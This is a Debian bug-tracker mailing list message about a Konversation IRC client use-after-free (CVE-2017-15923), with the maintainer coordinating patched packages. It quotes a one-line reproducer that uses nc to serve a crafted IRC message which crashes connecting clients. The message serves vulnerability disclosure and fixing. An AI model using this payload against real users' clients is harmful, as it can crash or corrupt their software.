[Pkg-kde-extras] Bug#881586: Konversation CVE-2017-15923
Yves-Alexis Perez
corsac at debian.org
Mon Nov 13 09:17:37 UTC 2017
Package: konversation
Tag: security
On Sun, 2017-11-12 at 17:01 -0500, Joseph Bisch wrote:
> Hi,
>
> See the November 11th security advisory for Konversation at:
>
> https://konversation.kde.org/
>
> Reproducer:
>
> echo $'privmsg \x16\x033\x8e3\x2eqt/\x03e\xe2\x16\n' | nc -l -p 6667
>
> and then connect to that with Konversation.
>
> May require ASan or other method of detecting the use after free.
Thanks for the report, I'm adding Pino in the loop but since it's a public
vulnerability you can directly report it to the BTS.
Pino, can you prepare an update for sid, stretch and jessie (with isolated
patches for stable releases)?
Regards,
--
Yves-Alexis
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 488 bytes
Desc: This is a digitally signed message part
URL: <http://lists.alioth.debian.org/pipermail/pkg-kde-extras/attachments/20171113/7922de05/attachment.sig>
More information about the pkg-kde-extras
mailing list